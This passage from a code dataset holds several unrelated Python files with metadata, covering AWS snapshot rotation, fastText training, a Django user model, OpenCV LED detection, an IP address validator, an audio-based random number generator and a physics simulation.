except:\n print(\"Incorrect number of snapshots, using default %s\" %\n NUMBER_SNAPSHOTS)\n elif opt == '-l':\n try:\n LIFETIME = int(arg)\n if LIFETIME < 1 or LIFETIME > 1000:\n LIFETIME = 24\n raise ValueError(\"Incorrect LIFETIME(-l) value\")\n except:\n print(\"Invalid -l argument, using default %s\" % LIFETIME)\n elif opt == '-i':\n if arg.index(','):\n INSTANCE_IDS = arg.split(',')\n else:\n INSTANCE_IDS = [arg]\n else:\n print(\"Bad option: %s\" % opt)\n\n\ndef traverse_instances():\n \"\"\"\n traverse instances\n \"\"\"\n global conn, INSTANCE_IDS, TAG\n reservations = conn.get_all_reservations()\n for res in reservations:\n for i in res.instances:\n if i.id in INSTANCE_IDS:\n INSTANCE_IDS.remove(i.id)\n traverse_all_volumes_for_instance(i)\n if len(INSTANCE_IDS) > 0:\n print(\"\\nError: the following instance ids where NOT found: %s\" %\n INSTANCE_IDS)\n\n\ndef traverse_all_instances_with_tag():\n global conn\n reservations = conn.get_all_reservations()\n for r in reservations:\n for i in r.instances:\n for tag in i.tags:\n if tag == TAG:\n if i.tags[tag] in [\"yes\", \"Yes\"]:\n traverse_all_volumes_for_instance(i)\n elif i.tags[tag] != '':\n print(\"Invalid value for tag: %s, on %s\" % (i.tags[tag], i.id))\n\n\ndef traverse_all_volumes_with_tag():\n global conn, VERBOSE, TAG\n print(\"Volumes with tag:\")\n volumes = conn.get_all_volumes(filters={'tag:' + TAG: ['yes', 'Yes']})\n for v in volumes:\n check_n_snapshot_volume(v)\n\n\ndef traverse_all_volumes_for_instance(instance_obj):\n global conn, VERBOSE\n# if VERBOSE:\n# if 'Name' in instance_obj.tags:\n# print(\"Instance: %s, Name: %s\" %\n# (instance_obj.id, instance_obj.tags['Name']))\n# else:\n# print(\"Instance: %s\" % instance_obj.id)\n\n if 'Name' in instance_obj.tags:\n print(\"Instance: %s, Name: %s\" %\n (instance_obj.id, instance_obj.tags['Name']))\n else:\n print(\"Instance: %s\" % instance_obj.id)\n volumes = conn.get_all_volumes(\n filters={'attachment.instance-id': instance_obj.id})\n for v in volumes:\n check_n_snapshot_volume(v)\n\n\ndef check_n_snapshot_volume(volume_obj):\n global conn, NUMBER_SNAPSHOTS, VERBOSE, CHECKED_VOLUMES\n\n # don-t check same volume more than once\n if volume_obj.id in CHECKED_VOLUMES:\n return\n\n if VERBOSE:\n if 'Name' in volume_obj.tags:\n print(\" Volume: %s, Name: %s\" %\n (volume_obj.id, volume_obj.tags['Name']))\n else:\n print(\" Volume: %s\" % volume_obj.id)\n\n # first delete snapshots if necessary\n snapshots = volume_obj.snapshots()\n ordered_snaps = sorted(snapshots,\n key=lambda vol: vol.start_time, reverse=True)\n if len(snapshots) >= NUMBER_SNAPSHOTS:\n while (len(ordered_snaps) >= NUMBER_SNAPSHOTS):\n del_snap = ordered_snaps.pop()\n print(\" Deleting snapshot: %s, description: %s\" % (\n del_snap.id, del_snap.description))\n try:\n del_snap.delete()\n except:\n print(\"\\tSnapshot not deleted, used by AMI ?\")\n\n now = datetime.datetime.now(tz.tzlocal())\n clock = now - timedelta(hours=LIFETIME)\n\n # create a snapshot if time is righ\n if len(ordered_snaps) > 0:\n newest = ordered_snaps.pop(0)\n start_time = dateutil.parser.parse(newest.start_time)\n\n if start_time < clock:\n snapshot_volume(volume_obj)\n elif VERBOSE:\n print(\" Recent snapshot found: %s, %s\" %\n (newest.id, newest.description))\n # create snapshot if the instance doesn't have one\n else:\n snapshot_volume(volume_obj)\n\n CHECKED_VOLUMES.append(volume_obj.id)\n\n\ndef snapshot_volume(volume_obj):\n now = datetime.datetime.now()\n desc = volume_obj.id + now.strftime(\"_%Y-%m-%d\")\n print(\" Creating snapshot %s\" % desc)\n volume_obj.create_snapshot(desc)\n\n\ndef help():\n global NUMBER_SNAPSHOTS, LIFETIME, BOTO_PROFILE\n print(\"\"\"\nUse:\n -n \n -l \n -t , default 'Snapshot'\n -p \n -i \n -v VERBOSE mode\n\"\"\" % (NUMBER_SNAPSHOTS, LIFETIME, BOTO_PROFILE))\n\n\nif __name__ == \"__main__\":\n parse_args(sys.argv[1:])\n instances = 'all'\n if type(INSTANCE_IDS) is list:\n instances = str(INSTANCE_IDS)\n if VERBOSE:\n print(\"\"\"Using boto profile: %s\nNumber of snapshots to keep for each volume: %s\nNumber of hours before creating a new snapshot: %s\nInstances to consider: %s\nTag: %s\n\"\"\" % (BOTO_PROFILE, NUMBER_SNAPSHOTS, LIFETIME, 'tagged' if instances == 'all' else instances, TAG))\n\n regions = ['us-east-1', 'us-west-1', 'us-west-2']\n for region in regions:\n print(\"Checking region '%s':\" % region)\n if len(BOTO_PROFILE) > 0:\n conn = boto.ec2.connect_to_region(region, profile_name=BOTO_PROFILE)\n else:\n conn = boto.ec2.connect_to_region(region)\n\n if len(INSTANCE_IDS) > 0:\n traverse_instances()\n else:\n traverse_all_instances_with_tag()\n traverse_all_volumes_with_tag()\n","sub_path":"python/aws_snapshot.py","file_name":"aws_snapshot.py","file_ext":"py","file_size_in_byte":8333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"431667105","text":"from ..fasttext.fasttext import FastText\nfrom ...utils.tools import Tools\nimport os, sys\n\nlog = Tools.get_logger('fasttext char')\n\nclass FastTextChar:\n def __init__(self, epoch=100, thread=30, dim=128, lr=0.05, update_rate=100, topk=5):\n self.topk = topk\n cur_path = os.path.dirname(os.path.realpath(__file__))\n if not os.path.exists(cur_path + '/model'):\n os.mkdir(cur_path + '/model')\n if not os.path.exists(cur_path + '/data'):\n os.mkdir(cur_path + '/data')\n model = 'model_{}_{}_{:.2f}_{}'.format(epoch, dim, lr, update_rate)\n self.obj = FastText(cur_path, 'char', epoch, thread, dim, lr, update_rate, model)\n\n def train(self):\n log.info('begin train')\n self.obj.train()\n log.info('end train')\n\n def test(self):\n log.info('begin test')\n self.obj.test(topk=self.topk)\n log.info('end test')\n\n def eval(self):\n log.info('begin eval')\n self.obj.eval(topk=self.topk)\n log.info('end eval')\n\nif __name__ == '__main__':\n ftc = FastTextChar(epoch=300, thread=30, dim=256, lr=0.5, update_rate=100, topk=5)\n if len(sys.argv) > 2:\n epoch = int(sys.argv[1])\n thread = int(sys.argv[2])\n dim = int(sys.argv[3])\n lr = float(sys.argv[4])\n update_rate = int(sys.argv[5])\n ws = int(sys.argv[6])\n neg = int(sys.argv[7])\n ftc = FastTextChar(epoch=epoch,\n thread=thread,\n dim=dim,\n lr=lr,\n update_rate=update_rate,\n ws=ws,\n neg=neg)\n if sys.argv[8] == 'train' or sys.argv[8] == 'all':\n ftc.train()\n if sys.argv[8] == 'test' or sys.argv[8] == 'all':\n ftc.test()\n if sys.argv[8] == 'eval' or sys.argv[8] == 'all':\n ftc.eval()\n","sub_path":"zhihu/models/fasttext_char/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"249361522","text":"from django.db import models\nfrom django.contrib.auth.models import AbstractBaseUser\nfrom django.core import validators\nfrom common.models import BaseModel\n\n# Create your models here.\n\n\nclass User(AbstractBaseUser, BaseModel):\n\n # authentification attributes\n\n username = models.CharField(help_text='A unique name used to login to the system.',\n max_length=255, unique=True,\n validators=[validators.RegexValidator(r'^ [\\w.@+-] +$',\n 'Enter a valid username, which means less than'\n '30 characters consisting of letters, numbers, '\n 'or these symbols: @ +-_.',\n 'invalid'), ],\n error_messages={'unique': \"Sorry, that username is already in use.\"})\n\n email = models.EmailField(help_text='A unique and valid email address.',\n unique=True,\n error_messages={'unique': \"Sorry, that email is already in use.\"})\n\n\n\n #profile attributes\n\n first_name = models.CharField(max_length=30, blank=True, null=True)\n\n last_name = models.CharField(max_length=30, blank=True, null=True) \n \n","sub_path":"auth/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"362460237","text":"import argparse\nimport numpy as np\nimport cv2\n\nGREEN = 60\nBLUE = 120\nYELLOW = 30\n\nSENSITIVITY = 15\n\n\ndef grey_histogram(img):\n hist = cv2.calcHist([img], [0], None, [256], [0, 256])\n return hist\n\n\ndef extract_bright(img):\n grey_img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n [minVal, maxVal, minLoc, maxLoc] = cv2.minMaxLoc(grey_img)\n margin = 0.80\n\n thresh = int(maxVal * margin) # in pix value to be extracted\n _, thresholdImage = cv2.threshold(grey_img, thresh, 255, cv2.THRESH_BINARY)\n\n return thresholdImage\n\n\ndef mask_image(image, color):\n lower_color = np.array([color - SENSITIVITY, 100, 100])\n upper_color = np.array([color + SENSITIVITY, 255, 255])\n\n mask = cv2.inRange(image, lower_color, upper_color)\n # output_image = cv2.bitwise_and(image, image, mask=mask)\n # return output_image\n return mask\n\n\ndef red_mask_image(image):\n lower_red_0 = np.array([0, 100, 100])\n upper_red_0 = np.array([SENSITIVITY, 255, 255])\n lower_red_1 = np.array([180 - SENSITIVITY, 100, 100])\n upper_red_1 = np.array([180, 255, 255])\n\n mask_0 = cv2.inRange(image, lower_red_0, upper_red_0)\n mask_1 = cv2.inRange(image, lower_red_1, upper_red_1)\n\n mask = cv2.bitwise_or(mask_0, mask_1)\n # output_image = cv2.bitwise_and(image, image, mask=mask)\n # return output_image\n return mask\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Process some integers.')\n parser.add_argument(\"-v\", \"--video_path\", dest='video_path', required=True)\n parser.add_argument(\"-o\", \"--output_dir\", dest='output_dir', required=False)\n\n args = parser.parse_args()\n\n cap = cv2.VideoCapture(args.video_path)\n\n while(cap.isOpened()):\n ret, frame = cap.read()\n if ret:\n frame = cv2.GaussianBlur(frame, (5, 5), 0)\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n\n green_mask = mask_image(frame, GREEN)\n red_mask = red_mask_image(frame)\n\n all_mask = cv2.bitwise_or(green_mask, red_mask)\n masked = cv2.bitwise_and(frame, frame, mask=all_mask)\n\n cv2.namedWindow('masked', cv2.WINDOW_NORMAL)\n cv2.imshow('masked', masked)\n\n thresh = extract_bright(masked)\n\n im2, contours, hierarchy = cv2.findContours(thresh, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n\n for cnt in contours:\n x, y, w, h = cv2.boundingRect(cnt)\n cv2.rectangle(frame, (x, y), (x + w, y + h), (255, 0, 0), 3)\n\n # cv2.drawContours(frame, contours, -1, (0, 0, 255), 3)\n cv2.namedWindow('frame', cv2.WINDOW_NORMAL)\n cv2.imshow('frame', frame)\n\n cv2.namedWindow('thresshold', cv2.WINDOW_NORMAL)\n cv2.imshow('thresshold', thresh)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n else:\n break\n\n cap.release()\n cv2.destroyAllWindows()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"python/video_led_recognizer.py","file_name":"video_led_recognizer.py","file_ext":"py","file_size_in_byte":2955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"306822449","text":"import torch\nimport torch.nn as nn\n\n# %%\nmodel_1 = nn.Linear(10, 10)\nmodel_2 = nn.Linear(10, 1)\n\nopt = torch.optim.Adam(model_2.parameters())\nloss_func = nn.MSELoss()\nx1_w = model_1.weight\n# %%\nx = torch.randn(size=(265, 10))\ny = torch.randn(size=(265, 1))\nfor i in range(2):\n x_1 = model_1(x)\n x_2 = model_2(x_1)\n loss = loss_func(x_2, y)\n assert torch.all(model_1.weight == x1_w)\n opt.zero_grad()\n loss.backward()\n opt.step()","sub_path":"Cgan4StrategyFinetune/check_pytorch_grad.py","file_name":"check_pytorch_grad.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"612593193","text":"'''\nCreated on Jun 22, 2017\n\n@author: lubo\n'''\nimport os\n\nimport pytest\n\nfrom sgains.config import Config\nfrom sgains.genome import Genome\nimport pandas as pd\n\n\n@pytest.fixture(scope='session')\ndef tests_config():\n config = Config.load(\"tests/data/scpipe_tests.yml\", use_config_dir=True)\n return config\n\n\n@pytest.fixture(scope='session')\ndef hg(tests_config):\n return Genome(tests_config)\n\n\n@pytest.fixture(scope='session')\ndef bin_boundaries(tests_config):\n bins_boundaries_fixture = os.path.join(\n tests_config.abspath(\n \"test_data/R100_B10k/hg19_R50_B20k_bins_boundaries.txt\")\n )\n df = pd.read_csv(\n bins_boundaries_fixture, sep='\\t')\n return df\n\n\n@pytest.fixture(scope='session')\ndef gc_bin_boundaries():\n gc_bins_boundaries_fixture = os.path.join(\n os.path.abspath(os.path.dirname(__file__)),\n \"data/varbin.gc.content.bowtie.txt\"\n )\n df = pd.read_csv(gc_bins_boundaries_fixture, sep='\\t')\n return df\n\n\n@pytest.fixture(scope='session')\ndef varbin_counts():\n fixture_filename = os.path.join(\n os.path.abspath(os.path.dirname(__file__)),\n \"data/varbin.txt\"\n )\n df = pd.read_csv(fixture_filename, sep='\\t')\n return df\n\n\n@pytest.fixture(scope='session')\ndef varbin0918():\n fixture_filename = os.path.join(\n os.path.abspath(os.path.dirname(__file__)),\n \"data/CJA0918.varbin.txt\"\n )\n df = pd.read_csv(fixture_filename, sep='\\t')\n return df\n","sub_path":"sgains/tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"247124194","text":"def isIPV4(string):\n if \".\" not in string:\n return False\n else:\n ipAddressValues = [int(number) for number in string.split(\".\")]\n if (len(ipAddressValues)!= 4):\n return False\n else:\n for i in range(4):\n if (ipAddressValues[i] < 0) or (ipAddressValues[i] > 255):\n return False\n return True\n\ndef isIPV6(string):\n if \":\" not in string:\n return False\n else:\n ipAddressValues = string.split(\":\")\n if (len(ipAddressValues) != 8):\n return False\n else:\n for i in range(8):\n if len(ipAddressValues[i])>4:\n return False\n try:\n (int(ipAddressValues[i], 16) <0) or (int(ipAddressValues[i],16) > 65535)\n except ValueError:\n return False\n return True\n\nnumberOfInputs = int(input())\ninputlist = []\nfor i in range(numberOfInputs):\n userinput = input()\n inputlist.append(userinput)\n\nfor i in range(numberOfInputs):\n if (isIPV4(inputlist[i]) == True):\n print(\"IPV4\")\n elif (isIPV6(inputlist[i]) == True):\n print(\"IPV6\")\n else:\n print(\"Neither\")\n","sub_path":"ip.py","file_name":"ip.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"218309183","text":"import pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn import tree\r\nfrom sklearn.model_selection import train_test_split\r\nimport graphviz\r\nimport pydotplus\r\nfrom sklearn.metrics import accuracy_score\r\nfrom sklearn.model_selection import KFold\r\nimport os\r\nos.chdir('G:\\\\VM_SYNC\\\\JYT-ML\\\\HW1')\r\n\r\n\r\ndata = pd.read_csv('googleplaystore.csv').dropna()\r\n\r\ntrain = data\r\n\r\nclf = tree.DecisionTreeClassifier()\r\nlabels = ['Rating','Reviews','Installs','Price']\r\n\r\na = [x.replace(',', '') for x in [x.strip('+') for x in train['Installs']]]\r\ntrain_installs = [float(x) for x in a]\r\ntrain_Rating = [float(x) for x in train['Rating']]\r\ntrain_Reviews = [float(x) for x in train['Reviews']]\r\ntrain_price = [ float(x.replace('$', '')) for x in train['Price']]\r\n\r\ndf_train = np.column_stack(([train_Rating,train_Reviews,train_installs,train_price]))\r\n\r\ncols = ['Category', 'Genres', 'Content Rating']\r\n\r\nKFoldconst = 10\r\nkf = KFold(n_splits=KFoldconst)\r\nkf.get_n_splits(df_train)\r\n\r\nfor idx in cols:\r\n accuracy = 0\r\n for train_index, test_index in kf.split(df_train):\r\n #print(\"TRAIN:\", train_index, \"TEST:\", test_index)\r\n T = np.array(train[idx])\r\n X_train, X_test = df_train[train_index], df_train[test_index]\r\n Y_train, Y_test = T[train_index], T[test_index] \r\n #print( type(X_train) , type(Y_train))\r\n \r\n clf = clf.fit( X_train, Y_train )\r\n Y_predict = clf.predict(X_test)\r\n \r\n accuracy += accuracy_score(Y_test, Y_predict)\r\n print(idx ,':K-fold accuracy is ',accuracy/KFoldconst)\r\n \r\n #pydotplus.graph_from_dot_data(dot_data).write_png(\"tree2.png\")\r\n","sub_path":"HW1/ML with testresult/kfold_google.py","file_name":"kfold_google.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"90568526","text":"import math\nimport struct\nimport matplotlib.pyplot as plt\nimport pyaudio\nimport numpy as np\nimport time\n\n'''\nCzas działania i generowania próbek:\nCzas potrzebny na wygenerowanie liczb 8 bitowych tylko na podstawie próbek z mikrofonu jest zależne od ustawień\nczęstotliwości próbkowania mikrofonu i wynosi w moim przypadku 44100 liczb/sekundę\nCzas potrzebny na wygenerowanie liczb 8 bitowych na podstawie istniejących już próbek z mikrofonu i przetworzeniu ich\nwg podejscia zaprezentowanego w pracy 'A True Random Number Generator Based onHyperchaos and Digital Sound'\nwynosi na moim laptopie około 132000 liczb/sekundę\n'''\n\n#funkcja do generowania liczb na podstawie samego mikrofonu(bez algorytmu processingu)\ndef getAudio(numOfSamples):\n\tCHUNK = 1024\n\tFORMAT = pyaudio.paInt16\n\tCHANNELS = 1\n\tRATE = 44100 # 44.1kHz\n\tp = pyaudio.PyAudio()\n\tstream = p.open(\n\t\tformat=FORMAT,\n\t\tchannels=CHANNELS,\n\t\trate=RATE,\n\t\tinput=True,\n\t\toutput=True,\n\t\tframes_per_buffer=CHUNK,\n\t\tinput_device_index=2 # słuchawki usb, musze jawnie zmienic, bo inaczej używa mikrofonu laptopa\n\t)\n\tcounter = 0\n\tsamples = []\n\twhile counter < numOfSamples:\n\t\tdata = stream.read(CHUNK) # ::2, by nie było powrotu do zera, brany co drugi element\n\t\tdata_int = np.array(struct.unpack(str(2 * CHUNK) + 'B', data), dtype='b')[::2] + 128\n\t\tfor i in range(len(data_int)):\n\t\t\tsamples.append(data_int[i])\n\t\t\tcounter +=1\n\treturn samples\n\ndef fT(x, a=1.999999):\n\tif 0<=x<=0.5:return a*x\n\telif 0.5<=x<=1:return a * (1-x)\n\treturn 1 # jak x ma złą wartość, ale taka sytuacji nigdy nie ma miejsca\n\ndef swap(string): # dziele stringa na pół i najpierw wchodzi druga połowa odwrócona, a potem pierwsza połowa normalna\n\ts = len(string)//2\n\toutputStr = string[:s-1:-1] + string[s-1::-1] # od: do: krok\n\treturn outputStr\n\ndef xorStr(str1, str2):\n\tif len(str1) != len(str2):return False\n\toutStr = \"\"\n\tfor d in range(len(str1)):\n\t\tif str1[d] == str2[d]: outStr+='0'\n\t\telse:outStr +='1'\n\treturn outStr\n\n'''Sam algorytm docelowy. Mogłem jeszcze zoptymalizować ilość pobieranych próbek z mikrofonu, bo do wygenerowania N\nliczb losowych potrzebuje tylko n=(N//32) próbek dźwięku, czyli nie ma potrzeby(jeśli chce łącznie wygenerować x liczb losowych),\nby czekać na x próbek audio (x/44100)sekund, wystarczyłby offsetLeft + (n * (x/N)) + offsetRight próbek, ale zrobiłem bez \noptymalizacji, by wyświetlić oryginalne liczby z audio bez processingu i liczby po processingu na jednym wykresie.\n'''\ndef TRNG(inputSampleArr, howMany = 100000, startSample=1000, N=256 ):\n\n\tif len(inputSampleArr)< startSample:return [] # jak za mało próbek wejdzie\n\t#N = 256 # wymagane bity TRNG na wyjściu\n\tL = 8 # CCML size\n\ty = L // 2 # wymagana ilość iteracji\n\t# wiersz oznacza czas t, tutaj poniżej są wartośći początkowe dla t=0\n\txArr = [[0.141592, 0.653589, 0.793238, 0.462643, 0.383279, 0.502884, 0.197169, 0.399375]]\n\tfor i in range(1, y + 1):\n\t\txArr.append([0] * 8) # wypełnienie zerami, by potem płynnie wstawiać i liczyć wartości\n\tn = (N * L) // ((L // 2) * 64) # ilość próbek audio (N//32)\n\t#print(\"n: \", n)\n\teps = 0.05 # coupling constant\n\tcounter = 0\n\toutput = []\n\twith open(\"TRNG32BitNumbers.bin\", 'ab') as binFile:\n\t\tbinFile.truncate(0) # usunięcie zawartości pliku TRNG32BitNumbers.bin jeśli taka zawartość już jest w tym pliku\n\t\twhile counter*N < howMany:\n\t\t\tr = [] # r ^ y - 3bitowa liczba z próbki dźwięku\n\t\t\tA = inputSampleArr[startSample: startSample + L] # tablica z próbkami dźwięku, nie zaczynam od zerowej próbki\n\t\t\tfor i in range(n): # tu było n\n\t\t\t\tmask = 1\n\t\t\t\ttempNum = 0\n\t\t\t\tfor k in range(3):\n\t\t\t\t\ttempNum += A[i] & mask\n\t\t\t\t\tmask <<= 1\n\t\t\t\tr.append(tempNum) # dodaj 3 bitową liczbę do tablicy r\n\n\t\t\tt = 0 # taki jakby czas\n\t\t\tNCounter = 0 # do zliczania, czy wygenerowałem w ponizszej petli while N(256) próbek\n\t\t\twhile NCounter < N: # 10sek/100000 liczb\n\t\t\t\tfor i in range(L): # tutaj t=0\n\t\t\t\t\txArr[t][i] = ((0.071428571 * r[i]) + xArr[t][i]) * (2/3)\n\t\t\t\tfor t in range(y): # y=4\n\t\t\t\t\tfor i in range(L):\n\t\t\t\t\t\t#print(\"t: \", t, \"i: \", i, \"xArr[i][t]: \", xArr[t][i])\n\t\t\t\t\t\txArr[t+1][i] = ((1-eps) * fT(xArr[t][i])) + ( (eps/2) * ( fT(xArr[t][(i+1)%L] ) + fT(xArr[t][(i-1)%L])))\n\t\t\t\tzArr = [] # 8 razy 64 bitowe ciągi zer i jedynek trzymane w tej tablicy jako binary string\n\t\t\t\tbinary = \"\"\n\t\t\t\tfor i in range(L):\n\t\t\t\t\tpacked = struct.pack('>d', xArr[y-1][i]) # endianess, musi być big endian (>)\n\t\t\t\t\tbinary = \"\".join(map(lambda x: format(x, 'b').zfill(8), packed ) )\n\t\t\t\t\tzArr.append( binary ) # 2 ostatnie najmniej znaczące bity z reprezentacji floata wchodzą do zArr\n\t\t\t\t\txArr[0][i] = xArr[y-1][i]\n\n\t\t\t\tfor i in range(L//2 ):\n\t\t\t\t\ttemp = swap(zArr[i + (L//2)])\n\t\t\t\t\tzArr[i] = xorStr(zArr[i], temp )\n\n\t\t\t\tfor i in range(L//2): # wybierz pierwszą połowe z tablicy zArr po zmianie\n\t\t\t\t\tfor k in range(8):#do histogramu wchodzą 8 bitowe liczb\n\t\t\t\t\t\tcurNumber = zArr[i][k*8: k*8+8]\n\t\t\t\t\t\tNCounter+=1\n\t\t\t\t\t\toutput.append(int(curNumber, 2))\n\t\t\t\t\t# ale do pliku zapisuje 32 bitowe liczby\n\t\t\t\t\tout1 = bytearray(int(binary[x:x+8], 2) for x in range(0, len(binary)//2, 8))\n\t\t\t\t\tout2 = bytearray(int(binary[x:x + 8], 2) for x in range(len(binary)//2, len(binary), 8))\n\t\t\t\t\tbinFile.write(out1) # pierwsze 32 bity liczby 64 bitowej\n\t\t\t\t\tbinFile.write(out2) # kolejne 32 bity liczby 64 bitowej\n\t\t\tcounter +=1\n\t\t\tstartSample += L # wez kolejne próbki, może tu jeszcze offset dać?\n\treturn output\n\ndef calcEntropy(arr):# w arr wchodzą liczby\n\txxd = {}\n\tfor i in range(len(arr)):\n\t\tif xxd.get(arr[i]) is not None:xxd[arr[i]] += 1\n\t\telse:xxd[arr[i]] = 1\n\tsuma = 0\n\tprobArr = [] # w probArr wchodzą prawdopodobieństwa\n\tfor key in xxd:\n\t\tprobArr.append(xxd[key] / len(arr))\n\tfor p in probArr:\n\t\tsuma += -(p * math.log2(p))\n\treturn suma\n\nN = 256\nstartSample = 1000\nhowManyNumbers = 1000000\n\nprint(\"Capturing audio...\")\nsourceOutput = getAudio(howManyNumbers)\nstart = time.time()\nTRGNOutput = TRNG(sourceOutput, howManyNumbers, startSample, N)[:howManyNumbers]\nprint(\"Entropy only from source: \", calcEntropy(sourceOutput))\nprint(\"Entropy after processing: \", calcEntropy(TRGNOutput))\nprint(f\"Czas potrzebny na samo wygenerowanie {howManyNumbers} liczb losowych po wcześniejczym dostarczeniu próbek audio: {time.time() - start}s\" )\n\nfig, (axis1, axis2) = plt.subplots(2)\nfig.tight_layout(pad=5.0) # odstęp między wykresami\n\nsourceOutput = sourceOutput[:howManyNumbers] # bez tego sourceOutput to zawsze wielokrotność CHUNK(1024)\nweights = np.ones_like(sourceOutput) / (len(sourceOutput))\naxis1.hist(sourceOutput, bins=256, alpha=1, weights=weights)\naxis1.set_title(\"Before processing\")\naxis1.set_xlabel(f\"Wartość 8 bitowa, entropia: {calcEntropy(sourceOutput)}\")\naxis1.set_ylabel(\"Prawdopodobieństwo\")\n\naxis2.hist(TRGNOutput, bins=256, alpha=1, weights=weights)\n\naxis2.set_title(\"After processing\")\naxis2.set_xlabel(f\"Wartość 8 bitowa, entropia: {calcEntropy(TRGNOutput)}\")\naxis2.set_ylabel(\"Prawdopodobieństwo\")\n\nplt.show()\n\n","sub_path":"TrueRandomGenerator/BSTGeneratorv2.py","file_name":"BSTGeneratorv2.py","file_ext":"py","file_size_in_byte":6974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"568893312","text":"from math import *\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef myPlot(t,P,x1,x2,xlabel,y1,y2,ylabel,title,filename):\n fig1 = plt.figure()\n plt.xlim(x1,x2)\n plt.ylim(y1, y2)\n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\n plt.title(title)\n plt.plot(t,P)\n plt.savefig(filename)\n plt.show()\n\ndef myPlot3x(x,y1,y2,y3,xlabel,y1label,y2label,y3label,title,filename):\n fig1 = plt.figure()\n #ax1 = fig1.add_subplot(3,1,1)\n #ax2 = fig1.add_subplot(3, 1, 2)\n #ax3 = fig1.add_subplot(3, 1, 3)\n\n ax1 = plt.subplot(311)\n plt.xlim(min(x),max(x))\n plt.ylim(min(y1), max(y1))\n plt.ylabel(y1label)\n plt.title(title)\n plt.plot(x,y1)\n\n ax2 = plt.subplot(312,sharex=ax1)\n plt.ylim(min(y2), max(y2))\n plt.ylabel(y2label)\n plt.plot(x, y2)\n\n ax3 = plt.subplot(313,sharex=ax1)\n plt.ylim(min(y3), max(y3))\n plt.xlabel(xlabel)\n plt.ylabel(y3label)\n plt.plot(x, y3)\n\n plt.savefig(filename)\n plt.show()\n\n\n\n#Mod. 3.2 Undamped Harmonic Oscillator\n#Problem Parameters\nt_0 = 0.0 #seconds\nm = 0.2 #kg\ng = 9.81 #m/s^2\nk = m #N/m spring const (This is assuming thaqt w=1 in this project)\nu = 0.1 #This is the parameter = b/(2*m)\nb = u*2*m #damping coeff. determined from set value of u\ns_1 = 1.0 #meters\ns_2 = s_1 + m*g/k #meters\ninit_displacement = 0.5 #meters the amount we perturb the system\ns_0 = s_2 + init_displacement #meters this is the starting location of the mass\nv_0 = 0.0 #m/s the mass starts from rest\n\n\ndelta_t=0.02 #seconds\n\nf_restore = -k*(s_0-s_1) #N the force that the spring exerts to return to equiquilibrium\nf_damp = -b*v_0 #damping force (always opposite motion\nf_net = f_restore + m*g #N the net force of the spring and the weight\na_0 = f_net/m #m/s^2 this is the accel due to net force of weight and spring\n\nt = [t_0]\ns = [s_0]\nv = [v_0]\na = [a_0]\n\ndelta_v = 0\ndelta_s=0\nt_max = 15.0 #s how long to run the sim\n#epsilon_stop = 1e-2\n#epsilon = 1.1*epsilon_stop\ncounter=0\n\nwhile t[counter] < t_max:\n counter+=1 #increment counter (0->1 on first trip through\n t_curr=t[counter-1]+delta_t #get the current time by adding delta_t\n t.append(t_curr) #add this time to the time list\n delta_v = a[counter-1] * delta_t #calc delta_v based on previous accel\n v.append(v[counter - 1] + delta_v) #add new v to v list\n delta_s = v[counter] * delta_t #calc delta_s based on current v\n s.append(s[counter - 1] + delta_s) #add new s to s list\n f_restore = -k * (s[counter] - s_2) #N the force that the spring exerts to return to equiquilibrium\n f_damp = -b * v[counter] #N damping force (always opposite motion\n f_net = f_restore + f_damp + m * g #N the net force of the spring and the weight\n a.append(f_net/m) #add new a to a list\n\n\n\ntitle_base = \"Damped Harmonic Oscillator\"\ntitle = title_base + \" delta_t = \" + str(delta_t)\nfilename = \"mod32_damped_oscillator_\" + str(delta_t) + \"_all.png\"\nxlabel = \"t (s)\"\ny1label = \"a (m/s^2)\"\ny2label = \"v (m/s)\"\ny3label = \"s (m)\"\n\nmyPlot3x(t,a,v,s,xlabel,y1label,y2label,y3label,title,filename)\n\n\"\"\"\ntitle_base = \"Damped Harmonic Oscillator\"\ntitle = title_base + \" delta_t = \" + str(delta_t)\nfilename = \"mod32_damped_oscillator_\" + str(delta_t) + \"_a.png\"\nxlabel = \"t (s)\"\nylabel = \"a (m/s^2)\"\nmyPlot(t,a,min(t),max(t),xlabel, min(a),max(a),ylabel, title,filename)\n\n\nfilename = \"mod32_damped_oscillator_\" + str(delta_t) + \"_v.png\"\nylabel = \"v (m/s)\"\nmyPlot(t,v,min(t),max(t),xlabel, min(v),max(v),ylabel, title,filename)\n\nfilename = \"mod32_damped_oscillator_\" + str(delta_t) + \"_s.png\"\nylabel = \"s (m)\"\nmyPlot(t,s,min(t),max(t),xlabel, min(s),max(s),ylabel, title,filename)\n\"\"\"\n\n\n\n\n\n","sub_path":"project3.2_3.py","file_name":"project3.2_3.py","file_ext":"py","file_size_in_byte":3826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"445522293","text":"from django.urls import path\n\nfrom 